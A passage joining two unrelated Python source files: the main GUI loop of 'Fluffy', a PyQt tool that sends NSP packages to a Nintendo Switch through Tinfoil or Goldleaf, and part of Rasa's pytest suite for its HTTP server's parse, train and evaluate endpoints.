@staticmethod
def about_menu_cmd():
try:
random.shuffle(thanks)
credit_list.clear()
for a in thanks:
credit_list.addItem(a)
about.show()
about.setFixedSize(about.size().width(),about.size().height())
except Exception as e:
print(str(e))
@staticmethod
def check_usb_success():
try:
connect_switch()
set_usb_success(True)
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
set_usb_success(False)
pass
if not usb_success:
UI.net_radio_cmd()
net_radio.setChecked(True)
usb_radio.setVisible(False)
l_rate.setVisible(False)
combo.setVisible(False)
gold_radio.setVisible(False)
l_switch.setText(Language.CurrentDict[12])
l_switch.setStyleSheet(BLUE)
# Main
try:
# Load Images
aboutpixmap.loadFromData(base64.b64decode(ABOUT_DATA))
goldpixmap.loadFromData(base64.b64decode(GOLD_DATA))
iconpixmap.loadFromData(base64.b64decode(ICON_DATA))
inlaypixmap.loadFromData(base64.b64decode(DONUT_DATA))
dinlaypixmap.loadFromData(base64.b64decode(DARK_DONUT_DATA))
#Init Widgets
l_host = QtWidgets.QLabel(Language.CurrentDict[3]+":")
txt_ip2 = QtWidgets.QLineEdit("0.0.0.0")
l_nsp = QtWidgets.QLabel("")
l_ip = QtWidgets.QLabel(Language.CurrentDict[2]+":")
l_port = QtWidgets.QLabel("Port:")
txt_ip = QtWidgets.QLineEdit("0.0.0.0")
tin_radio = QtWidgets.QRadioButton("Tinfoil")
gold_radio = QtWidgets.QRadioButton("Goldleaf")
split_check = QtWidgets.QCheckBox("Use Split NSP")
dark_check = QtWidgets.QCheckBox(Language.CurrentDict[20])
usb_radio = QtWidgets.QRadioButton("USB")
net_radio = QtWidgets.QRadioButton(Language.CurrentDict[24])
btn_nsp = QtWidgets.QPushButton(Language.CurrentDict[13])
btn_header = QtWidgets.QPushButton(Language.CurrentDict[1])
l_rate = QtWidgets.QLabel(Language.CurrentDict[4])
l_github = QtWidgets.QLabel("v" + VERSION)
l_status = QtWidgets.QLabel(Language.CurrentDict[9])
l_switch = QtWidgets.QLabel(Language.CurrentDict[10]+"!")
list_nsp = QtWidgets.QListWidget()
combo = QComboBox()
h_box = QtWidgets.QHBoxLayout()
h2_box = QtWidgets.QHBoxLayout()
h3_box = QtWidgets.QHBoxLayout()
h_group = QtWidgets.QButtonGroup()
v_box = QtWidgets.QVBoxLayout()
img_label = QLabel()
progressbar = QProgressBar()
gold_img_label = QLabel()
about = QMainWindow()
about_v_box = QtWidgets.QVBoxLayout()
credit_list = QtWidgets.QListWidget()
monero_list = QtWidgets.QListWidget()
about_img_label = QLabel()
l_thanks = QtWidgets.QLabel(Language.CurrentDict[31])
l_donate = QtWidgets.QLabel(Language.CurrentDict[32])
#Set Widgets
try:
fill = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
txt_ip2.setText(str(fill))
except:
pass
try:
txt_ip.setText(switch_ip)
except:
txt_ip.setText("0.0.0.0")
pass
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
txt_port = QtWidgets.QLineEdit("2000")
txt_port.setEnabled(False)
h3_box.addWidget(dark_check)
h3_box.addStretch()
h3_box.addWidget(l_github)
combo.addItem(Language.CurrentDict[6])
combo.addItem(Language.CurrentDict[5])
combo.setCurrentIndex(1)
tin_radio.setChecked(True)
tin_radio.toggled.connect(UI.tin_radio_cmd)
gold_radio.setChecked(False)
gold_radio.toggled.connect(UI.gold_radio_cmd)
h_group.addButton(tin_radio)
h_group.addButton(gold_radio)
h2_box.addWidget(tin_radio)
h2_box.addWidget(gold_radio)
dark_check.stateChanged.connect(UI.dark_mode_cmd)
usb_radio.setChecked(True)
usb_radio.toggled.connect(UI.usb_radio_cmd)
h_box.addWidget(usb_radio)
net_radio.toggled.connect(UI.net_radio_cmd)
h_box.addWidget(net_radio)
btn_header.setEnabled(False)
progressbar.setAlignment(Qt.AlignVCenter)
progressbar.setMaximum(100)
img_label.setAlignment(Qt.AlignCenter)
gold_img_label.setAlignment(Qt.AlignCenter)
gold_img_label.setPixmap(goldpixmap)
# About Window
about_v_box.setContentsMargins(0,0,0,0)
about_img_label.setAlignment(Qt.AlignCenter)
l_thanks.setAlignment(Qt.AlignCenter)
l_donate.setAlignment(Qt.AlignCenter)
about_img_label.setPixmap(aboutpixmap)
about_v_box.addWidget(about_img_label)
about_v_box.addWidget(l_thanks)
about_v_box.addWidget(credit_list)
about_v_box.addWidget(l_donate)
about_v_box.addWidget(monero_list)
about.setCentralWidget(QWidget(about))
about.centralWidget().setLayout(about_v_box)
about.setWindowTitle(Language.CurrentDict[30])
about.setWindowIcon(QIcon(iconpixmap))
for a in thanks:
credit_list.addItem(a)
monero_list.addItem("Monero(XMR)")
monero_list.addItem(MONERO_ADDRESS)
# Menu Bar
lang_menu = window.menuBar().addMenu(Language.CurrentDict[22])
about_menu = window.menuBar().addAction(Language.CurrentDict[30])
lang_group = QActionGroup(lang_menu)
#lang_group.setExclusive(True)
lang_group.addAction(QAction('English',lang_group,checkable=True))
lang_group.addAction(QAction('中文',lang_group,checkable=True))
lang_group.addAction(QAction('Tiếng Việt',lang_group,checkable=True))
lang_group.addAction(QAction('Türkçe',lang_group,checkable=True))
lang_group.addAction(QAction('Português Brasileiro',lang_group,checkable=True))
lang_group.addAction(QAction('Italiano',lang_group,checkable=True))
lang_group.addAction(QAction('Français',lang_group,checkable=True))
lang_group.addAction(QAction('Español',lang_group,checkable=True))
lang_group.addAction(QAction('Deutsch',lang_group,checkable=True))
lang_group.addAction(QAction('Bahasa Indonesia',lang_group,checkable=True))
lang_group.addAction(QAction('한국어',lang_group,checkable=True))
lang_menu.addActions(lang_group.actions())
lang_group.triggered.connect(UI.lang_menu_cmd)
about_menu.triggered.connect(UI.about_menu_cmd)
window.menuBar().setNativeMenuBar(False) # Possible MacOS Fix
# "And for gosh sake watch your language!" -Tony, May 1st 2015
aix = 0
for action in lang_menu.actions():
if aix == language:
action.setChecked(True)
aix+=1
UI.init_language()
# Occupy VBOX
v_box.addLayout(h2_box)
v_box.addWidget(img_label)
v_box.addStretch()
v_box.addWidget(gold_img_label)
v_box.addStretch()
v_box.addLayout(h_box)
v_box.addWidget(l_ip)
v_box.addWidget(txt_ip)
v_box.addWidget(l_host)
v_box.addWidget(txt_ip2)
v_box.addWidget(l_rate)
v_box.addWidget(combo)
v_box.addWidget(btn_nsp)
v_box.addWidget(btn_header)
v_box.addWidget(l_nsp)
v_box.addWidget(l_status)
v_box.addWidget(l_switch)
v_box.addWidget(progressbar)
v_box.addWidget(list_nsp)
v_box.addLayout(h3_box)
window.setCentralWidget(QWidget(window))
window.centralWidget().setLayout(v_box)
window.setWindowTitle(Language.CurrentDict[0])
btn_nsp.clicked.connect(UI.nsp_file_dialog)
btn_header.clicked.connect(UI.send_header_cmd)
window.setWindowIcon(QIcon(iconpixmap))
gold_img_label.setVisible(False)
window.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)
window.show()
# Revert to network mode
UI.check_usb_success()
# Checkbox for Dark Mode
if dark_mode == 1:
try:
set_dark_mode(1)
dark_check.setChecked(True)
except:
set_dark_mode(0)
dark_check.setChecked(False)
pass
else:
set_dark_mode(0)
dark_check.setChecked(False)
# Main loop
while True:
QApplication.processEvents()
# QMessage Response
if needresponse:
if ignore_warning_prompt == 0:
print("To ignore future prompts, change \'ignore_warning_prompt\' to 1 in fluffy.conf.")
if qrespnum == 0:
re = QMessageBox.warning(window, 'Warning!', "Goldleaf wants to read a file that isn't an NSP.\nLet Goldleaf read this file?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if re == QMessageBox.No:
set_response_qmessage(False)
elif re == QMessageBox.Yes:
set_response_qmessage(True)
elif qrespnum == 1:
re = QMessageBox.warning(window, 'Warning!', "Goldleaf wants to write a file.\nConfirm file write?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if re == QMessageBox.No:
set_response_qmessage(False)
elif re == QMessageBox.Yes:
set_response_qmessage(True)
elif qrespnum == 2:
re = QMessageBox.warning(window, 'Warning!', "Goldleaf wants to create a file.\nConfirm creation?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if re == QMessageBox.No:
set_response_qmessage(False)
elif re == QMessageBox.Yes:
set_response_qmessage(True)
elif qrespnum == 3:
re = QMessageBox.warning(window, 'Warning!', "Goldleaf wants to create a directory.\nConfirm creation?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if re == QMessageBox.No:
set_response_qmessage(False)
elif re == QMessageBox.Yes:
set_response_qmessage(True)
elif qrespnum == 4:
re = QMessageBox.warning(window, 'Warning!', "Goldleaf wants to delete a file.\nConfirm deletion?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if re == QMessageBox.No:
set_response_qmessage(False)
elif re == QMessageBox.Yes:
set_response_qmessage(True)
elif qrespnum == 5:
re = QMessageBox.warning(window, 'Warning!', "Goldleaf wants to delete a directory.\nConfirm deletion?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if re == QMessageBox.No:
set_response_qmessage(False)
elif re == QMessageBox.Yes:
set_response_qmessage(True)
elif qrespnum == 6:
re = QMessageBox.warning(window, 'Warning!', "Goldleaf wants to rename a file or directory.\nConfirm rename?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if re == QMessageBox.No:
set_response_qmessage(False)
elif re == QMessageBox.Yes:
set_response_qmessage(True)
else:
set_response_qmessage(True)
while haveresponse:
time.sleep(1)
# Check If Any Errors
if last_error != "NA":
if not task_canceled:
msg_box = QMessageBox.critical(window, 'Error', last_error, QMessageBox.Ok)
reset_last_error()
cancel_task()
# Check Log Size
if is_logging:
if os.path.isfile(initial_dir + 'fluffy.log'):
if os.path.getsize(initial_dir + 'fluffy.log') > 250000:
logging.debug("Error: Log size reached, turning off logging.")
turn_off_logging()
# Fix Dark Mode CheckBox
if dark_mode == 0 and dark_check.isChecked():
dark_check.setChecked(False)
# Save config and close
if not window.isVisible():
try:
switch_ip = txt_ip.text()
except:
pass
save_config()
cancel_task()
sys.exit()
# Switch Indicator
if not is_installing and not is_network and usb_success and not sent_header:
UI.set_switch_text()
# Tinfoil Network Mode
if not sent_header and not is_installing and is_network:
l_switch.setText(Language.CurrentDict[12])
l_switch.setStyleSheet(BLUE)
if list_nsp.count() > 0:
btn_header.setEnabled(True)
else:
btn_header.setEnabled(False)
# Network Header Sent
if sent_header and is_network:
try:
if is_done:
UI.set_done_text()
else:
if is_installing:
UI.set_progress_text()
else:
l_status.setText(Language.CurrentDict[25])
l_switch.setText(Language.CurrentDict[15])
l_switch.setStyleSheet(PURPLE)
except:
pass
# Cancel Button
if sent_header and not is_done:
btn_header.setEnabled(True)
btn_header.setText(Language.CurrentDict[16])
# Installation in progress disable cancel
#if sent_header and is_installing and not is_done:
#btn_header.setEnabled(False)
# Goldleaf & Tinfoil USB Mode
if sent_header and not is_network:
try:
if is_done:
UI.set_done_text()
else:
if is_installing:
UI.set_progress_text()
else:
UI.set_loading_text()
except:
pass
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
save_config()
sys.exit()
|
test_server.py | import asyncio
import json
import os
import time
import urllib.parse
import uuid
from contextlib import ExitStack
from http import HTTPStatus
from multiprocessing import Process, Manager
from multiprocessing.managers import DictProxy
from pathlib import Path
from typing import List, Text, Type, Generator, NoReturn, Dict, Optional
from unittest.mock import Mock, ANY
import pytest
import requests
from _pytest import pathlib
from _pytest.monkeypatch import MonkeyPatch
from aioresponses import aioresponses
from freezegun import freeze_time
from mock import MagicMock
from ruamel.yaml import StringIO
from sanic import Sanic
from sanic.testing import SanicASGITestClient
import rasa
import rasa.constants
import rasa.core.jobs
import rasa.nlu
import rasa.server
import rasa.shared.constants
import rasa.shared.utils.io
import rasa.utils.io
from rasa.core import utils
from rasa.core.agent import Agent, load_agent
from rasa.core.channels import (
channel,
CollectingOutputChannel,
RestInput,
SlackInput,
CallbackInput,
)
from rasa.core.channels.slack import SlackBot
from rasa.core.tracker_store import InMemoryTrackerStore
from rasa.model import unpack_model
from rasa.nlu.test import CVEvaluationResult
from rasa.shared.core import events
from rasa.shared.core.constants import (
ACTION_SESSION_START_NAME,
ACTION_LISTEN_NAME,
REQUESTED_SLOT,
SESSION_START_METADATA_SLOT,
)
from rasa.shared.core.domain import Domain, SessionConfig
from rasa.shared.core.events import (
Event,
UserUttered,
SlotSet,
BotUttered,
ActionExecuted,
SessionStarted,
)
from rasa.shared.core.trackers import DialogueStateTracker
from rasa.shared.nlu.constants import INTENT_NAME_KEY
from rasa.train import TrainingResult
from rasa.utils.endpoints import EndpointConfig
from tests.core.conftest import DEFAULT_STACK_CONFIG
from tests.nlu.utilities import ResponseTest
from tests.utilities import json_of_latest_request, latest_request
# a couple of event instances that we can use for testing
test_events = [
Event.from_parameters(
{
"event": UserUttered.type_name,
"text": "/goodbye",
"parse_data": {
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"entities": [],
},
}
),
BotUttered("Welcome!", {"test": True}),
SlotSet("cuisine", 34),
SlotSet("cuisine", "34"),
SlotSet("location", None),
SlotSet("location", [34, "34", None]),
]
# sequence of events expected at the beginning of trackers
session_start_sequence: List[Event] = [
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
]
@pytest.fixture
def rasa_app_without_api(rasa_server_without_api: Sanic) -> SanicASGITestClient:
return rasa_server_without_api.asgi_client
@pytest.fixture
def rasa_app(rasa_server: Sanic) -> SanicASGITestClient:
return rasa_server.asgi_client
@pytest.fixture
def rasa_app_nlu(rasa_nlu_server: Sanic) -> SanicASGITestClient:
return rasa_nlu_server.asgi_client
@pytest.fixture
def rasa_app_core(rasa_core_server: Sanic) -> SanicASGITestClient:
return rasa_core_server.asgi_client
@pytest.fixture
def rasa_secured_app(rasa_server_secured: Sanic) -> SanicASGITestClient:
return rasa_server_secured.asgi_client
@pytest.fixture()
async def tear_down_scheduler() -> Generator[None, None, None]:
yield None
rasa.core.jobs.__scheduler = None
@pytest.mark.trains_model
async def test_root(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
async def test_root_without_enable_api(rasa_app_without_api: SanicASGITestClient):
_, response = await rasa_app_without_api.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
@pytest.mark.trains_model
async def test_root_secured(rasa_secured_app: SanicASGITestClient):
_, response = await rasa_secured_app.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
@pytest.mark.trains_model
async def test_version(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/version")
content = response.json()
assert response.status == HTTPStatus.OK
assert content.get("version") == rasa.__version__
assert (
content.get("minimum_compatible_version")
== rasa.constants.MINIMUM_COMPATIBLE_VERSION
)
@pytest.mark.trains_model
async def test_status(rasa_app: SanicASGITestClient, trained_rasa_model: Text):
_, response = await rasa_app.get("/status")
model_file = response.json()["model_file"]
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
assert os.path.isfile(model_file)
assert model_file == trained_rasa_model
@pytest.mark.trains_model
async def test_status_nlu_only(
rasa_app_nlu: SanicASGITestClient, trained_nlu_model: Text
):
_, response = await rasa_app_nlu.get("/status")
model_file = response.json()["model_file"]
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
assert "model_file" in response.json()
assert model_file == trained_nlu_model
@pytest.mark.trains_model
async def test_status_secured(rasa_secured_app: SanicASGITestClient):
_, response = await rasa_secured_app.get("/status")
assert response.status == HTTPStatus.UNAUTHORIZED
@pytest.mark.trains_model
async def test_status_not_ready_agent(rasa_app: SanicASGITestClient):
rasa_app.app.agent = None
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.CONFLICT
@pytest.fixture
def shared_statuses() -> DictProxy:
return Manager().dict()
@pytest.fixture
def background_server(
shared_statuses: DictProxy, tmpdir: pathlib.Path, monkeypatch: MonkeyPatch
) -> Generator[Process, None, None]:
# Create a fake model archive which the mocked train function can return
fake_model = Path(tmpdir) / "fake_model.tar.gz"
fake_model.touch()
fake_model_path = str(fake_model)
# Fake training function which blocks until we tell it to stop blocking
# If we can send a status request while this is blocking, we can be sure that the
# actual training is also not blocking
async def mocked_training_function(*_, **__) -> TrainingResult:
# Tell the others that we are now blocking
shared_statuses["started_training"] = True
# Block until somebody tells us to not block anymore
while shared_statuses.get("stop_training") is not True:
time.sleep(1)
return TrainingResult(model=fake_model_path)
def run_server(monkeypatch: MonkeyPatch) -> NoReturn:
import sys
monkeypatch.setattr(
sys.modules["rasa.train"], "train_async", mocked_training_function,
)
from rasa import __main__
sys.argv = ["rasa", "run", "--enable-api"]
__main__.main()
server = Process(target=run_server, args=(monkeypatch,))
yield server
server.terminate()
@pytest.fixture()
def training_request(
shared_statuses: DictProxy, tmp_path: Path
) -> Generator[Process, None, None]:
def send_request() -> None:
payload = {}
project_path = Path("examples") / "formbot"
for file in [
"domain.yml",
"config.yml",
Path("data") / "rules.yml",
Path("data") / "stories.yml",
Path("data") / "nlu.yml",
]:
full_path = project_path / file
# Read in as dictionaries to avoid that keys, which are specified in
# multiple files (such as 'version'), clash.
content = rasa.shared.utils.io.read_yaml_file(full_path)
payload.update(content)
concatenated_payload_file = tmp_path / "concatenated.yml"
rasa.shared.utils.io.write_yaml(payload, concatenated_payload_file)
payload_as_yaml = concatenated_payload_file.read_text()
response = requests.post(
"http://localhost:5005/model/train",
data=payload_as_yaml,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"force_training": True},
)
shared_statuses["training_result"] = response.status_code
train_request = Process(target=send_request)
yield train_request
train_request.terminate()
# Due to unknown reasons this test can not be run in pycharm, it
# results in segfaults...will skip in that case - test will still get run on CI.
# It also doesn't run on Windows because of Process-related calls and an attempt
# to start/terminate a process. We will investigate this case further later:
# https://github.com/RasaHQ/rasa/issues/6302
@pytest.mark.skipif("PYCHARM_HOSTED" in os.environ, reason="results in segfault")
@pytest.mark.skip_on_windows
@pytest.mark.trains_model
def test_train_status_is_not_blocked_by_training(
background_server: Process, shared_statuses: DictProxy, training_request: Process
):
background_server.start()
def is_server_ready() -> bool:
try:
return (
requests.get("http://localhost:5005/status").status_code
== HTTPStatus.OK
)
except Exception:
return False
# wait until server is up before sending train request and status test loop
start = time.time()
while not is_server_ready() and time.time() - start < 60:
time.sleep(1)
assert is_server_ready()
training_request.start()
# Wait until the blocking training function was called
start = time.time()
while (
shared_statuses.get("started_training") is not True and time.time() - start < 60
):
time.sleep(1)
# Check if the number of currently running trainings was incremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == HTTPStatus.OK
assert response.json()["num_active_training_jobs"] == 1
# Tell the blocking training function to stop
shared_statuses["stop_training"] = True
start = time.time()
while shared_statuses.get("training_result") is None and time.time() - start < 60:
time.sleep(1)
assert shared_statuses.get("training_result")
# Check that the training worked correctly
assert shared_statuses["training_result"] == HTTPStatus.OK
# Check if the number of currently running trainings was decremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == HTTPStatus.OK
assert response.json()["num_active_training_jobs"] == 0
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
@pytest.mark.trains_model
async def test_parse(rasa_app: SanicASGITestClient, response_test: ResponseTest):
_, response = await rasa_app.post(
response_test.endpoint, json=response_test.payload
)
rjs = response.json()
assert response.status == HTTPStatus.OK
assert all(prop in rjs for prop in ["entities", "intent", "text"])
assert rjs["entities"] == response_test.expected_response["entities"]
assert rjs["text"] == response_test.expected_response["text"]
assert rjs["intent"] == response_test.expected_response["intent"]
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse?emulation_mode=wit",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=dialogflow",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=luis",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
@pytest.mark.trains_model
async def test_parse_with_different_emulation_mode(
rasa_app: SanicASGITestClient, response_test: ResponseTest
):
_, response = await rasa_app.post(
response_test.endpoint, json=response_test.payload
)
assert response.status == HTTPStatus.OK
@pytest.mark.trains_model
async def test_parse_without_nlu_model(rasa_app_core: SanicASGITestClient):
_, response = await rasa_app_core.post("/model/parse", json={"text": "hello"})
assert response.status == HTTPStatus.OK
rjs = response.json()
assert all(prop in rjs for prop in ["entities", "intent", "text"])
@pytest.mark.trains_model
async def test_parse_on_invalid_emulation_mode(rasa_app_nlu: SanicASGITestClient):
_, response = await rasa_app_nlu.post(
"/model/parse?emulation_mode=ANYTHING", json={"text": "hello"}
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_train_stack_success_with_md(
rasa_app: SanicASGITestClient,
default_domain_path: Text,
default_stack_config: Text,
default_nlu_data: Text,
tmp_path: Path,
):
payload = dict(
domain=Path(default_domain_path).read_text(),
config=Path(default_stack_config).read_text(),
stories=Path("data/test_stories/stories_defaultdomain.md").read_text(),
nlu=Path(default_nlu_data).read_text(),
)
_, response = await rasa_app.post("/model/train", json=payload)
assert response.status == HTTPStatus.OK
assert response.headers["filename"] is not None
# save model to temporary file
model_path = str(tmp_path / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
@pytest.mark.trains_model
async def test_train_nlu_success(
rasa_app: SanicASGITestClient,
default_stack_config: Text,
default_nlu_data: Text,
default_domain_path: Text,
tmp_path: Path,
):
domain_data = rasa.shared.utils.io.read_yaml_file(default_domain_path)
config_data = rasa.shared.utils.io.read_yaml_file(default_stack_config)
nlu_data = rasa.shared.utils.io.read_yaml_file(default_nlu_data)
# combine all data into our payload
payload = {
key: val for d in [domain_data, config_data, nlu_data] for key, val in d.items()
}
data = StringIO()
rasa.shared.utils.io.write_yaml(payload, data)
_, response = await rasa_app.post(
"/model/train",
data=data.getvalue(),
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
# save model to temporary file
model_path = str(tmp_path / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
@pytest.mark.trains_model
async def test_train_core_success_with(
rasa_app: SanicASGITestClient,
default_stack_config: Text,
default_stories_file: Text,
default_domain_path: Text,
tmp_path: Path,
):
payload = f"""
{Path(default_domain_path).read_text()}
{Path(default_stack_config).read_text()}
{Path(default_stories_file).read_text()}
"""
_, response = await rasa_app.post(
"/model/train",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
# save model to temporary file
model_path = str(tmp_path / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
@pytest.mark.trains_model
async def test_train_with_retrieval_events_success(
rasa_app: SanicASGITestClient, default_stack_config: Text, tmp_path: Path
):
with ExitStack() as stack:
domain_file = stack.enter_context(
open("data/test_domains/default_retrieval_intents.yml")
)
config_file = stack.enter_context(open(default_stack_config))
core_file = stack.enter_context(
open("data/test_stories/stories_retrieval_intents.md")
)
responses_file = stack.enter_context(open("data/test_responses/default.yml"))
nlu_file = stack.enter_context(
open("data/test/stories_default_retrieval_intents.yml")
)
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=core_file.read(),
responses=responses_file.read(),
nlu=nlu_file.read(),
)
_, response = await rasa_app.post("/model/train", json=payload, timeout=60 * 5)
assert response.status == HTTPStatus.OK
assert_trained_model(response.body, tmp_path)
def assert_trained_model(response_body: bytes, tmp_path: Path) -> None:
# save model to temporary file
model_path = str(tmp_path / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response_body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
@pytest.mark.parametrize(
"payload",
[
{"config": None, "stories": None, "nlu": None, "domain": None, "force": True},
{
"config": None,
"stories": None,
"nlu": None,
"domain": None,
"force": False,
"save_to_default_model_directory": True,
},
{
"config": None,
"stories": None,
"nlu": None,
"domain": None,
"save_to_default_model_directory": False,
},
],
)
def test_deprecation_warnings_json_payload(payload: Dict):
with pytest.warns(FutureWarning):
rasa.server._validate_json_training_payload(payload)
@pytest.mark.trains_model
async def test_train_with_yaml(rasa_app: SanicASGITestClient, tmp_path: Path):
training_data = """
stories:
- story: My story
steps:
- intent: greet
- action: utter_greet
rules:
- rule: My rule
steps:
- intent: greet
- action: utter_greet
intents:
- greet
nlu:
- intent: greet
examples: |
- hi
- hello
responses:
utter_greet:
- text: Hi
language: en
policies:
- name: RulePolicy
pipeline:
- name: KeywordIntentClassifier
"""
_, response = await rasa_app.post(
"/model/train",
data=training_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert_trained_model(response.body, tmp_path)
@pytest.mark.trains_model
async def test_train_with_invalid_yaml(rasa_app: SanicASGITestClient):
invalid_yaml = """
rules:
rule my rule
"""
_, response = await rasa_app.post(
"/model/train",
data=invalid_yaml,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.parametrize(
"headers, expected",
[({}, False), ({"force_training": False}, False), ({"force_training": True}, True)],
)
def test_training_payload_from_yaml_force_training(
headers: Dict, expected: bool, tmp_path: Path
):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request, tmp_path)
assert payload.get("force_training") == expected
@pytest.mark.parametrize(
"headers, expected",
[
({}, rasa.shared.constants.DEFAULT_MODELS_PATH),
({"save_to_default_model_directory": False}, ANY),
(
{"save_to_default_model_directory": True},
rasa.shared.constants.DEFAULT_MODELS_PATH,
),
],
)
def test_training_payload_from_yaml_save_to_default_model_directory(
headers: Dict, expected: Text, tmp_path: Path
):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request, tmp_path)
assert payload.get("output")
assert payload.get("output") == expected
@pytest.mark.trains_model
async def test_train_missing_config(rasa_app: SanicASGITestClient):
payload = dict(domain="domain data", config=None)
_, response = await rasa_app.post("/model/train", json=payload)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_train_missing_training_data(rasa_app: SanicASGITestClient):
payload = dict(domain="domain data", config="config data")
_, response = await rasa_app.post("/model/train", json=payload)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_train_internal_error(rasa_app: SanicASGITestClient):
payload = dict(domain="domain data", config="config data", nlu="nlu data")
_, response = await rasa_app.post("/model/train", json=payload)
assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
@pytest.mark.trains_model
async def test_evaluate_stories(
rasa_app: SanicASGITestClient, default_stories_file: Text
):
stories = rasa.shared.utils.io.read_file(default_stories_file)
_, response = await rasa_app.post(
"/model/test/stories",
data=stories,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
js = response.json()
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert not js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
@pytest.mark.trains_model
async def test_evaluate_stories_not_ready_agent(
rasa_app_nlu: SanicASGITestClient, default_stories_file: Text
):
stories = rasa.shared.utils.io.read_file(default_stories_file)
_, response = await rasa_app_nlu.post("/model/test/stories", data=stories)
assert response.status == HTTPStatus.CONFLICT
@pytest.mark.trains_model
async def test_evaluate_stories_end_to_end(
rasa_app: SanicASGITestClient, end_to_end_test_story_md_file: Text
):
stories = rasa.shared.utils.io.read_file(end_to_end_test_story_md_file)
_, response = await rasa_app.post("/model/test/stories?e2e=true", data=stories,)
assert response.status == HTTPStatus.OK
js = response.json()
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert js["is_end_to_end_evaluation"]
assert js["actions"] != []
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
@pytest.mark.trains_model
async def test_evaluate_intent(rasa_app: SanicASGITestClient, default_nlu_data: Text):
nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)
_, response = await rasa_app.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
@pytest.mark.trains_model
async def test_evaluate_intent_json(rasa_app: SanicASGITestClient):
